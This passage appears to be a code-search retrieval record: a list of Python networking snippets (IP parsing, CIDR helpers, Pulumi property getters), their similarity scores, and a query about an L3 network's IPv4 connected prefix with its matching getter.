"def pack_ip(self, str_ip):\n return struct.pack(\">BBBB\", *[ int(c) for c in str_ip.split(\".\") ])",
"def getAddress(self) -> int:\n ...",
"def AioMessageTypeToIpAddressString(message_type):\n ip = network_config.AioMessageTypeToIpAddress(message_type)\n return '%d.%d.%d.%d' % (ip.a, ip.b, ip.c, ip.d)",
"def get_packet_type(cls, type_):\n if type_ <= ether.ETH_TYPE_IEEE802_3:\n type_ = ether.ETH_TYPE_IEEE802_3\n return cls._TYPES.get(type_)",
"def __init__(self):\n self.id = None\n self.typeInfo['id'] = 'string'\n \"\"\"availability of the network offering\"\"\"\n self.availability = None\n self.typeInfo['availability'] = 'string'\n \"\"\"true if network offering is ip conserve mode enabled\"\"\"\n self.conservemode = None\n self.typeInfo['conservemode'] = 'boolean'\n \"\"\"the date this network offering was created\"\"\"\n self.created = None\n self.typeInfo['created'] = 'date'\n \"\"\"additional key/value details tied with network offering\"\"\"\n self.details = None\n self.typeInfo['details'] = 'map'\n \"\"\"an alternate display text of the network offering.\"\"\"\n self.displaytext = None\n self.typeInfo['displaytext'] = 'string'\n \"\"\"true if guest network default egress policy is allow; false if default egress policy is deny\"\"\"\n self.egressdefaultpolicy = None\n self.typeInfo['egressdefaultpolicy'] = 'boolean'\n \"\"\"true if network offering can be used by VPC networks only\"\"\"\n self.forvpc = None\n self.typeInfo['forvpc'] = 'boolean'\n \"\"\"guest type of the network offering, can be Shared or Isolated\"\"\"\n self.guestiptype = None\n self.typeInfo['guestiptype'] = 'string'\n \"\"\"true if network offering is default, false otherwise\"\"\"\n self.isdefault = None\n self.typeInfo['isdefault'] = 'boolean'\n \"\"\"true if network offering supports persistent networks, false otherwise\"\"\"\n self.ispersistent = None\n self.typeInfo['ispersistent'] = 'boolean'\n \"\"\"maximum number of concurrents connections to be handled by lb\"\"\"\n self.maxconnections = None\n self.typeInfo['maxconnections'] = 'integer'\n \"\"\"the name of the network offering\"\"\"\n self.name = None\n self.typeInfo['name'] = 'string'\n \"\"\"data transfer rate in megabits per second allowed.\"\"\"\n self.networkrate = None\n self.typeInfo['networkrate'] = 'integer'\n \"\"\"the ID of the secondary service offering used by virtual router provider\"\"\"\n self.secondaryserviceofferingid = None\n self.typeInfo['secondaryserviceofferingid'] = 'string'\n \"\"\"the name of the secondary service offering used by virtual router provider\"\"\"\n self.secondaryserviceofferingname = None\n self.typeInfo['secondaryserviceofferingname'] = 'string'\n \"\"\"the ID of the service offering used by virtual router provider\"\"\"\n self.serviceofferingid = None\n self.typeInfo['serviceofferingid'] = 'string'\n \"\"\"the name of the service offering used by virtual router provider\"\"\"\n self.serviceofferingname = None\n self.typeInfo['serviceofferingname'] = 'string'\n \"\"\"true if network offering supports specifying ip ranges, false otherwise\"\"\"\n self.specifyipranges = None\n self.typeInfo['specifyipranges'] = 'boolean'\n \"\"\"true if network offering supports vlans, false otherwise\"\"\"\n self.specifyvlan = None\n self.typeInfo['specifyvlan'] = 'boolean'\n \"\"\"state of the network offering. Can be Disabled/Enabled/Inactive\"\"\"\n self.state = None\n self.typeInfo['state'] = 'string'\n \"\"\"true if network offering supports network that span multiple zones\"\"\"\n self.supportsstrechedl2subnet = None\n self.typeInfo['supportsstrechedl2subnet'] = 'boolean'\n \"\"\"the tags for the network offering\"\"\"\n self.tags = None\n self.typeInfo['tags'] = 'string'\n \"\"\"the traffic type for the network offering, supported types are Public, Management, Control, Guest, Vlan or Storage.\"\"\"\n self.traffictype = None\n self.typeInfo['traffictype'] = 'string'\n \"\"\"the list of supported services\"\"\"\n self.service = []",
"def ip_info():\n return str(getIP())",
"def block_override_dns_type(self) -> str:\n return pulumi.get(self, \"block_override_dns_type\")",
"def IpNetwork(address, version=None):\n\n if version:\n if version == 4:\n return Ipv4Network(address)\n elif version == 6:\n return Ipv6Network(address)\n\n try:\n return Ipv4Network(address)\n except (ValueError):\n pass\n\n try:\n return Ipv6Network(address)\n except (ValueError):\n pass\n\n raise ValueError('%r does not appear to be an IPv4 or IPv6 network' % address)",
"def source_type(self):\n return SOURCE_TYPE_ROUTER",
"def source_type(self):\n return SOURCE_TYPE_ROUTER",
"def address(self):\n return f\"{self._type}.{self._id}\"",
"def get_allocated_address(\n self, config: ActorPoolConfig, allocated: allocated_type\n ) -> str:",
"def OSSupportsIPv4(self) -> bool:",
"def make(self, *,\n htype: 'Enum_Hardware | StdlibEnum | AenumEnum | str | int' = Enum_Hardware.Ethernet,\n htype_default: 'Optional[int]' = None,\n htype_namespace: 'Optional[dict[str, int] | dict[int, str] | Type[StdlibEnum] | Type[AenumEnum]]' = None, # pylint: disable=line-too-long\n htype_reversed: 'bool' = False,\n ptype: 'Enum_EtherType | StdlibEnum | AenumEnum | str | int' = Enum_EtherType.Internet_Protocol_version_4,\n ptype_default: 'Optional[int]' = None,\n ptype_namespace: 'Optional[dict[str, int] | dict[int, str] | Type[StdlibEnum] | Type[AenumEnum]]' = None, # pylint: disable=line-too-long\n ptype_reversed: 'bool' = False,\n hlen: 'int' = 6,\n plen: 'int' = 4,\n oper: 'Enum_Operation | StdlibEnum | AenumEnum | str | int' = Enum_Operation.REQUEST,\n oper_default: 'Optional[int]' = None,\n oper_namespace: 'Optional[dict[str, int] | dict[int, str] | Type[StdlibEnum] | Type[AenumEnum]]' = None, # pylint: disable=line-too-long\n oper_reversed: 'bool' = False,\n sha: 'str | bytes | bytearray' = '00:00:00:00:00:00',\n spa: 'IPv4Address | IPv6Address | str | bytes | bytearray' = '0.0.0.0', # nosec: B104\n tha: 'str | bytes | bytearray' = '00:00:00:00:00:00',\n tpa: 'IPv4Address | IPv6Address | str | bytes | bytearray' = '0.0.0.0', # nosec: B104\n payload: 'bytes | Protocol | Schema' = b'',\n **kwargs: 'Any') -> 'Schema_ARP':\n _htype = self._make_index(htype, htype_default, namespace=htype_namespace,\n reversed=htype_reversed, pack=False)\n _ptype = self._make_index(ptype, ptype_default, namespace=ptype_namespace,\n reversed=ptype_reversed, pack=False)\n _oper = self._make_index(oper, oper_default, namespace=oper_namespace,\n reversed=oper_reversed, pack=False)\n\n return Schema_ARP(\n htype=_htype,\n ptype=_ptype,\n hlen=hlen,\n plen=plen,\n oper=_oper,\n sha=self._make_addr_resolve(sha, _htype),\n spa=self._make_proto_resolve(spa, _ptype),\n tha=self._make_addr_resolve(tha, _htype),\n tpa=self._make_proto_resolve(tpa, _ptype),\n payload=payload,\n )",
"def get_ip_freebind(self):\n if hasattr(socket, \"IP_FREEBIND\"):\n # Valid distribution\n return socket.IP_FREEBIND\n if sys.platform == \"linux2\":\n return 15\n return None",
"def device_type(self) -> str:\n return \"urn:schemas-upnp-org:device:InternetGatewayDevice:1\"",
"def addressing(self) -> Optional[AddressingType]: # pylint: disable=unsubscriptable-object\n return self.pdu_sequence[0].addressing if self.pdu_sequence else None",
"def get_ip_address(self):\n raise NotImplementedError",
"def Address(self) -> _n_5_t_0:",
"def get_preferred_ip(self, ip_type: IPTypes) -> str:\n if ip_type.value in self.ip_addrs:\n return self.ip_addrs[ip_type.value]\n raise CloudSQLIPTypeError(\n \"Cloud SQL instance does not have any IP addresses matching \"\n f\"preference: {ip_type.value})\"\n )",
"def new_ip(address):\n return IPy.IP(address)",
"def __init__(self) -> None:\n self.ip_address: str | None = None",
"def get_type(network: ipaddress.ip_network) -> str:\n for t in TYPES:\n if getattr(network, f\"is_{t}\"):\n return t",
"def ipv4(self):\n return Network(private=True).ipv4",
"def __index__(cls) -> 'Enum_EtherType': # pylint: disable=invalid-index-returned\n return Enum_EtherType.Address_Resolution_Protocol # type: ignore[return-value]",
"def address(self):\n return \"%s:%s\" % (self.ip, self.port)",
"def _get_network_type(self, host):\n network_type = host.get(\"network\")\n default_network = self.config.get(\"default_network\")\n if network_type is None:\n network_type = self._metadata.get(\"network\", default_network)\n if not network_type:\n raise ProvisioningConfigError(\n \"No network type specified and project doesn't have default \"\n \"network type (property 'default_network') specified in \"\n \"provisioning config.\"\n )\n return network_type",
"def __detect_type__(self, value):\n def is_ipv6_address(value):\n try:\n value, interface = value.split('%', 1)\n except: # noqa\n pass\n try:\n parts = value.split(':')\n for part in parts:\n if part == '':\n continue\n part = int(part, 16)\n if part < 0:\n raise ValueError\n return True\n except Exception:\n return False\n\n def is_ipv4_address(value):\n try:\n value, interface = value.split('%', 1)\n except: # noqa\n pass\n try:\n parts = value.split('.', 3)\n for part in parts:\n part = int(part)\n if part < 0 or part > 255:\n raise ValueError\n return True\n except: # noqa\n return False\n\n # Strip port\n if value.startswith('['):\n value = value[1:]\n try:\n value, port = value.split(':', 1)\n except: # noqa\n pass\n\n if value.endswith(']'):\n value = value[:-1]\n\n if is_ipv4_address(value):\n return 1, value, 'ipv4_address'\n\n elif is_ipv6_address(value):\n return 2, value, 'ipv6_address'\n\n else:\n return 0, value, 'hostname'",
"def get_ip_string():\n return netifaces.ifaddresses('br0')[netifaces.AF_INET][0]['addr']",
"def address(self):\n if self.con_strategy == \"local\":\n return self.address_local()\n if self.con_strategy == \"remote\":\n return self.address_remote()\n return None",
"def source_type(self) -> SourceType:\n return SourceType.ROUTER",
"def source_type(self) -> SourceType:\n return SourceType.ROUTER",
"def source_type(self) -> SourceType:\n return SourceType.ROUTER",
"def __init__(\n self, name: str = \"\", protocol: int | None = None, **kwargs: Any\n ) -> None:\n\n super().__init__(name=name, **kwargs)\n\n if protocol not in [None, 4, 6]:\n raise ValueError(\"IpAddress protocol needs to be either 4, 6 or None\")\n self.protocol = protocol",
"def _get_protocol_type(self):\n return self.__protocol_type",
"def __ip2intstr(self, address):\n return str(struct.unpack('!I', address)[0])",
"def new_ip(address):\n return ipaddress.IPv4Address(address)",
"def LocalAddress(self) -> _n_5_t_0:",
"def __init__(self, address, type,):\n self.address = address\n self.type = type",
"def _is_network_type(self, name):\n nt = self.config[\"networks\"].get(name)\n return bool(nt)",
"def get_primary_ip(options, index):\n\n second_octet = 160 + index\n return \"192.%s.1.1\" % second_octet",
"def __init__(\n self, name: str = \"\", protocol: int | None = None, **kwargs: Any\n ) -> None:\n\n super().__init__(name=name, **kwargs)\n if not ipaddress:\n raise SoftDependencyError(\"ipaddress\")\n if protocol not in [None, 4, 6]:\n raise ValueError(\"IpAddress protocol needs to be either 4, 6 or None\")\n self.protocol = protocol",
"def to_python(self, value):\n if isinstance(value, (ipaddress.IPv4Network, ipaddress.IPv6Network)):\n return value\n\n if value is None:\n return value\n\n try:\n return ipaddress.ip_network(value)\n except ValueError:\n raise ValidationError(_(\"Invalid input for an IP network.\"))",
"def ipAddress():\n \n sk = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sk.connect((\"8.8.8.8\", 80))\n ip = (sk.getsockname()[0])\n sk.close()\n return str(ip)",
"def test_create_host_subnet(self):\n pass",
"def get_address(self):\r\n return \"iDigi\"",
"def address_family(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"address_family\")",
"def app_network_access_type(self) -> Optional[pulumi.Input['DomainAppNetworkAccessType']]:\n return pulumi.get(self, \"app_network_access_type\")",
"def guess_network(self):\n # decide what sort of network we are going to use\n # return the actual type\n # right now we just use the first host only network and that's it\n host_only = list(HostOnlyNetwork.find_networks())\n if host_only:\n return host_only[0]\n else:\n return NewHostOnlyNetwork()",
"def SupportsIPv4(self) -> bool:",
"def getIp(self):\n raise NotImplementedError",
"def adjust_ip (self, ip=None):\n if ip != None and ip.haslayer(IP):\n if (self.type == 0x11):\n if (self.gaddr == \"0.0.0.0\"):\n ip.dst = \"224.0.0.1\" # IP rule 1\n retCode = True \n elif isValidMCAddr(self.gaddr):\n ip.dst = self.gaddr # IP rule 3a\n retCode = True\n else:\n print \"Warning: Using invalid Group Address\"\n retCode = False\n elif ((self.type == 0x17) and isValidMCAddr(self.gaddr)):\n ip.dst = \"224.0.0.2\" # IP rule 2\n retCode = True\n elif ((self.type == 0x12) or (self.type == 0x16)) and (isValidMCAddr(self.gaddr)):\n ip.dst = self.gaddr # IP rule 3b\n retCode = True\n else:\n print \"Warning: Using invalid IGMP Type\"\n retCode = False\n else:\n print \"Warning: No IGMP Group Address set\"\n retCode = False\n if retCode == True:\n ip.ttl=1 # IP Rule 4\n ip.options=[IPOption_Router_Alert()] # IP rule 5\n return retCode",
"def is_on_stack(self, address):\n return self.is_address_of_type(address, MemoryType.Stack)",
"def buildProtocol(addr):",
"def type(self) -> Optional[pulumi.Input[Union[str, 'AgentPoolType']]]:\n return pulumi.get(self, \"type\")",
"def server_type(self):\n ...",
"def app_network_access_type(self) -> pulumi.Output[Optional['DomainAppNetworkAccessType']]:\n return pulumi.get(self, \"app_network_access_type\")",
"def get_network_allocations_number(self):\r\n LOG.debug(\"Get network allocations number.\")\r\n return constants.IP_ALLOCATIONS",
"def allocate_address():\n response = EC2.allocate_address(\n )\n return response",
"def __str__(self):\n return \"{}\".format(visiteur.ip)"
] | [
"0.6558105",
"0.6343783",
"0.62579095",
"0.6204035",
"0.61733663",
"0.60764885",
"0.60489833",
"0.6027968",
"0.590761",
"0.5870783",
"0.57298845",
"0.5710156",
"0.569875",
"0.5694414",
"0.5689083",
"0.5678903",
"0.5581792",
"0.5554217",
"0.5541468",
"0.55387825",
"0.5525745",
"0.55044353",
"0.55011237",
"0.5486684",
"0.5449133",
"0.5444622",
"0.54439265",
"0.54439265",
"0.5438365",
"0.5434098",
"0.54337263",
"0.54220146",
"0.54215086",
"0.5400311",
"0.53990924",
"0.53750294",
"0.53706646",
"0.5356622",
"0.53405666",
"0.5335872",
"0.5334917",
"0.53232276",
"0.5311669",
"0.5299823",
"0.5293537",
"0.5280677",
"0.5266033",
"0.5264635",
"0.52623934",
"0.52623934",
"0.5261298",
"0.5239982",
"0.52353704",
"0.5234466",
"0.5227017",
"0.52248585",
"0.52146244",
"0.52139854",
"0.52075285",
"0.51957333",
"0.5188182",
"0.5170947",
"0.516927",
"0.51688737",
"0.5168697",
"0.5167536",
"0.51347405",
"0.5131819",
"0.5124529",
"0.51238346",
"0.5104629",
"0.5104629",
"0.5104629",
"0.5102564",
"0.5093965",
"0.5091164",
"0.50869805",
"0.50857097",
"0.5078986",
"0.50723845",
"0.5067969",
"0.5061323",
"0.5042722",
"0.5033845",
"0.50227296",
"0.50064415",
"0.49977282",
"0.4990625",
"0.49844098",
"0.49809164",
"0.49645197",
"0.4952559",
"0.49496102",
"0.4946586",
"0.49462265",
"0.49414185",
"0.49401394",
"0.4938156",
"0.49322572",
"0.49314168"
] | 0.66921926 | 0 |
The IPV4 prefix (CIDR) assigned to this L3 network. Required when the IP allocation type is IPV4 or DualStack. | def ipv4_connected_prefix(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "ipv4_connected_prefix") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def local_ipv4_network_cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"local_ipv4_network_cidr\")",
"def local_ipv4_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"local_ipv4_network_cidr\")",
"def local_ipv4_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"local_ipv4_network_cidr\")",
"def ipv4_connected_prefix(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv4_connected_prefix\")",
"def ipv4(self):\n return Network(private=True).ipv4",
"def ipv4_address(self) -> str:\n return pulumi.get(self, \"ipv4_address\")",
"def ipv4_address(self) -> str:\n return pulumi.get(self, \"ipv4_address\")",
"def ipv4_cidr_block(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv4_cidr_block\")",
"def ipv4_address_space(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"ipv4_address_space\")",
"def ipv4_address_space(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv4_address_space\")",
"def network(self):\n address = unicode(\"%s/%s\" % (self.address, _get_cidr(self.netmask)))\n return IPv4Network(address, strict=False)",
"def cluster_ipv4_cidr(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"This field is deprecated, use cluster_ipv4_cidr_block.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"cluster_ipv4_cidr is deprecated: This field is deprecated, use cluster_ipv4_cidr_block.\"\"\")\n\n return pulumi.get(self, \"cluster_ipv4_cidr\")",
"def prefixes_ipv4(self):\n with open(self.ixpfx) as f:\n ixpfx = json.load(f)\n return [item['prefix'] for item in ixpfx['data'] if item['protocol'] == 'IPv4']",
"def ipv4_address(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv4_address\")",
"def remote_ipv4_network_cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"remote_ipv4_network_cidr\")",
"def node_ipv4_cidr(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"This field is deprecated, use node_ipv4_cidr_block.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"node_ipv4_cidr is deprecated: This field is deprecated, use node_ipv4_cidr_block.\"\"\")\n\n return pulumi.get(self, \"node_ipv4_cidr\")",
"def _get_ipv4(self):\n return self.__ipv4",
"def _get_ipv4(self):\n return self.__ipv4",
"def _get_ipv4(self):\n return self.__ipv4",
"def subnet_prefix(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"subnet_prefix\")",
"def remote_ipv4_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"remote_ipv4_network_cidr\")",
"def remote_ipv4_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"remote_ipv4_network_cidr\")",
"def get_ipv4_address(self):\n \n ipv4_address = self._dhcp_client_ctrl.getIpv4Address()\n if ipv4_address is None:\n return None\n else:\n return unicode(ipv4_address)",
"def getIpv4Netmask(self):\n with self.status._dhcp_status_mutex:\n if self.status.ipv4_lease_valid is None:\n return None\n else:\n return self.status.ipv4_netmask",
"def master_ipv4_cidr_block(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"master_ipv4_cidr_block\")",
"def local_ipv6_network_cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"local_ipv6_network_cidr\")",
"def ip_address_prefix(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_address_prefix\")",
"def normalize_ip4(self):\n\n ip = str(self.ip4)\n # Let's normalize the ip list first\n ip_list = list(\n map(\n lambda v: ipaddress.IPv4Network(v),\n filter(\n lambda v: self.try_convert(v, None, ipaddress.IPv4Network),\n map(\n lambda v: v.split('|')[1].split('/')[0].strip()\n if '|' in v else\n v.split('/')[0].strip(),\n ip.split(',')\n )\n )\n )\n )\n\n if ip_list:\n ip_list.sort()\n ip = tuple(\n int(c)\n for c in str(ip_list[0]).split('/')[0].split('.')\n )\n else:\n ip = (9999, ip)\n\n self.ip4 = ip",
"def node_ipv4_cidr_size(self) -> int:\n return pulumi.get(self, \"node_ipv4_cidr_size\")",
"def cidr(self):\n return self._cidr",
"def prefixlen(self):\n return self._ip_range.prefixlen",
"def local_ipv6_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"local_ipv6_network_cidr\")",
"def local_ipv6_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"local_ipv6_network_cidr\")",
"def NoOfAddressPrefix(self):\n return self._get_attribute('noOfAddressPrefix')",
"def get_ipv4_netmask(self):\n \n ipv4_netmask = self._dhcp_client_ctrl.getIpv4Netmask()\n if ipv4_netmask is None:\n return None\n else:\n return unicode(ipv4_netmask)",
"def cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"cidr\")",
"def cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"cidr\")",
"def Ipv4Flag(self):\r\n\t\treturn self._get_attribute('ipv4Flag')",
"def getIpv4Address(self):\n with self.status._dhcp_status_mutex:\n if self.status.ipv4_lease_valid is None:\n return None\n else:\n return self.status.ipv4_address",
"def get_address(self):\n return self.get_ipv4_address()",
"def cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cidr\")",
"def cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cidr\")",
"def cidr(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"cidr\")",
"def cidr(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"cidr\")",
"def services_ipv4_cidr(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"This field is deprecated, use services_ipv4_cidr_block.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"services_ipv4_cidr is deprecated: This field is deprecated, use services_ipv4_cidr_block.\"\"\")\n\n return pulumi.get(self, \"services_ipv4_cidr\")",
"def __str__(self):\n retval = \"IPv4\\n\"\n for field in self.layout:\n if (field.name == \"src\" or field.name == \"dst\"):\n value = inet_ntop(AF_INET,\n struct.pack('!L', self.__dict__[field.name]))\n retval += \"%s %s\\n\" % (field.name, value)\n else:\n retval += \"%s %s\\n\" % (field.name, self.__dict__[field.name])\n return retval",
"def allocate_subnet(self):\n if len(self.subnet_list) == 0:\n subnet = '192.168.1.0/24'\n self.subnet_list.append(subnet)\n return subnet\n else:\n subnet = self.subnet_list[::-1][0]\n ip = ipaddress.IPv4Network(subnet)[0]\n s = ipaddress.IPv4Address(ip) + 256\n return '{}{}'.format(s, '/24')",
"def Ipv4rate(self):\n\t\treturn self._get_attribute('ipv4rate')",
"def reverse_prefix(self):\n if self.type == ZONE_REVERSE_IPV4:\n # Get IPv4 prefix covering reverse zone\n n = self.name.lower()\n if n.endswith(\".in-addr.arpa\"):\n r = n[:-13].split(\".\")\n r.reverse()\n length = 4 - len(r)\n r += [\"0\"] * length\n ml = 32 - 8 * length\n return \".\".join(r) + \"/%d\" % ml\n elif self.type == ZONE_REVERSE_IPV6:\n # Get IPv6 prefix covering reverse zone\n n = self.name.lower()\n if n.endswith(\".ip6.int\"):\n n = n[:-8]\n elif n.endswith(\".ip6.arpa\"):\n n = n[:-9]\n else:\n raise Exception(\"Invalid IPv6 zone suffix\")\n p = n.split(\".\")\n p.reverse()\n length = len(p)\n if length % 4:\n p += [\"0\"] * (4 - length % 4)\n r = \"\"\n for i, c in enumerate(p):\n if i and i % 4 == 0:\n r += \":\"\n r += c\n if len(p) != 32:\n r += \"::\"\n prefix = r + \"/%d\" % (length * 4)\n return IPv6(prefix).normalized.prefix",
"def test_ip4_cidr_syntax_internal_v6(self):\n \n test_ip = ip_address.IPAddress(\"192.168.0.1/24\")\n \n assert test_ip.addr == [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0xff, 192, 168, 0, 1]\n assert test_ip.subnet == [0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0]\n \n test_ip = ip_address.IPAddress(\"127.0.0.1/16\") \n assert test_ip.addr == [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1]\n assert test_ip.subnet == [0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0, 0]\n \n test_ip = ip_address.IPAddress(\"127.0.0.1/8\")\n assert test_ip.subnet == [0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0]\n \n test_ip = ip_address.IPAddress(\"127.0.0.1\")\n assert test_ip.subnet == []",
"def address_prefix(self) -> Optional[str]:\n return pulumi.get(self, \"address_prefix\")",
"def test_IPv4s_to_valid_CIDR(self):\n self.assertEqual(\n helpers.IPRange_to_valid_CIDR('192.168.0.1', '192.168.0.1'),\n '192.168.0.1/32'\n )",
"def to_network_v4(zone: Zone) -> ipaddress.IPv4Network:\n\n labels = zone.name.split(\".\")[:-3]\n netmask: int = 8 * len(labels)\n offset = 4 - len(labels)\n\n pattern = r\"^(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)([/-](2[5-9]|3[0-1]))?$\"\n last_label_parsed = re.search(pattern, labels[0])\n if not last_label_parsed:\n raise ValueError(\"Faild to parse the zone name\")\n\n if last_label_parsed[2]:\n # non-octet boundary delegation detected\n # remove netmask and save it to the result\n last_octect = last_label_parsed[1]\n labels[0] = last_octect\n netmask = int(last_label_parsed[2][1:])\n\n labels = [\"0\"] * offset + labels\n prefix_str = \".\".join(reversed(labels))\n prefix_str += f\"/{netmask}\"\n\n return ipaddress.IPv4Network(prefix_str, strict=True)",
"def customer_owned_ipv4_pool(self) -> str:\n return pulumi.get(self, \"customer_owned_ipv4_pool\")",
"def public_ip_prefixes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ResourceReferenceArgs']]]]:\n return pulumi.get(self, \"public_ip_prefixes\")",
"def getnetwork(ipaddr):\n return '192.168.1.0/24'",
"def PrefixIpv6Address(self):\n if self.force_auto_sync:\n self.get('PrefixIpv6Address')\n return self._PrefixIpv6Address",
"def get_ip4_adresses(self):\n self._search_regx(self.PATTERN_IP4)\n return self._ip_adresses",
"def get_netmask(self):\n return self.get_ipv4_netmask()",
"def cidr_block(self):\n return self._cidr_block",
"def ipv6_connected_prefix(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"ipv6_connected_prefix\")",
"def ip4range(iprange):\n assert not ('/' in iprange and '-' in iprange),'cidr and dash notation is not possible'\n if '/' in iprange:\n #cidr range\n ippart,mask=iprange.split('/',1)\n mask=int(mask)\n ip=ip_pad(ippart)\n lowerlong,upperlong=cidr2lowerupper(ip,mask)\n lowerip=long2ip(lowerlong)\n upperip=long2ip(upperlong)\n \n elif '-' in iprange:\n lpart,upart=iprange.split('-',1)\n lowerip=ip_pad(lpart)\n \n #upperip only one octet? fill last specified octed from lpart\n if '.' not in upart:\n sp=lpart.split('.')\n sp[-1]=upart\n upart='.'.join(sp)\n \n upperip=ip_pad(upart,True)\n else:\n lowerip=ip_pad(iprange)\n upperip=ip_pad(iprange,True)\n \n return lowerip,upperip",
"def subnet_prefix_length(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"subnet_prefix_length\")",
"def format_ipv4(value, mask=None):\n value_ipv4 = \".\".join([str(int(x, 16)) for x in re.findall('..', \"{:08x}\".format(value))])\n if mask is None:\n return value_ipv4\n value_mask = \".\".join([str(int(x, 16)) for x in re.findall('..', \"{:08x}\".format(mask))])\n return \"{}/{}\".format(value_ipv4, value_mask)",
"def _validate_network_prefix(self):\n try:\n cidr = netaddr.IPNetwork(self.network + \"/\" + str(self.prefix))\n except netaddr.core.AddrFormatError:\n raise ValueError(_(\"Invalid IP address and prefix\"))\n address = netaddr.IPAddress(self.network)\n if address != cidr.network:\n raise ValueError(_(\"Invalid IP network %(address)s/%(prefix)s \"\n \"expecting %(network)s/%(prefix)s\") %\n {'address': self.network,\n 'prefix': self.prefix,\n 'network': cidr.network})",
"def get_main_ipv4():\n try:\n # No data is actually transmitted (UDP)\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect( ('8.8.8.8', 53) )\n real_ip = s.getsockname()[0]\n s.close()\n return real_ip\n except socket.error as e:\n logging.error(\"Cannot retrieve current IPv4 address: %s\" % e)\n return None",
"def ipv6_connected_prefix(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv6_connected_prefix\")",
"def isIpv4AddrWithNetmask(string):\n return (True)",
"def get_min_addr(self):\n\n out = None\n for segment in self.segments:\n if out is None or segment.min_addr < out:\n out = segment.min_addr\n\n if out is None:\n for section in self.sections:\n if out is None or section.min_addr < out:\n out = section.min_addr\n\n if out is None:\n return self.rebase_addr\n else:\n return out + self.rebase_addr",
"def get_dns_name_prefix(self) -> Union[str, None]:\n return self._get_dns_name_prefix(enable_validation=True)",
"def ip(self):\n if not self._ip:\n if 'ip' in self.config:\n ip = self.config['ip']\n else:\n ip = self.protocol.transport.get_extra_info('sockname')[0]\n ip = ip_address(ip)\n if ip.version == 4:\n self._ip = ip\n else: # pragma: no cover\n response = urlopen('http://ipv4.icanhazip.com/')\n ip = response.read().strip().decode()\n ip = ip_address(ip)\n self._ip = ip\n return self._ip",
"def tunnel1_inside_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"tunnel1_inside_cidr\")",
"def tunnel1_inside_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"tunnel1_inside_cidr\")",
"def encode_ipv4(self, input):\n return inet_aton(input)",
"def get_ipv4_defaultgw(self):\n \n ipv4_defaultgw = self._dhcp_client_ctrl.getIpv4DefaultGateway()\n if ipv4_defaultgw is None:\n return None\n else:\n return unicode(ipv4_defaultgw)",
"def _rloc_ip_net_addr(self):\n self.net_addr = ':'.join(self.rloc.split(':')[:-1]) + ':'\n return self.net_addr",
"def find_ipv4():\n try:\n r = requests.get(v4_url)\n tree = html.fromstring(r.content)\n result = tree.xpath('//body/text()')\n result = result[0].split()\n ipv4 = result[len(result)-1]\n except:\n if cfg['debug']:\n print(\"Couldn't connect to %s\" % v4_url)\n print(\"Check that you have a valid IPv4 default route\")\n ipv4 = None\n\n return ipv4",
"def tunnel1_inside_cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"tunnel1_inside_cidr\")",
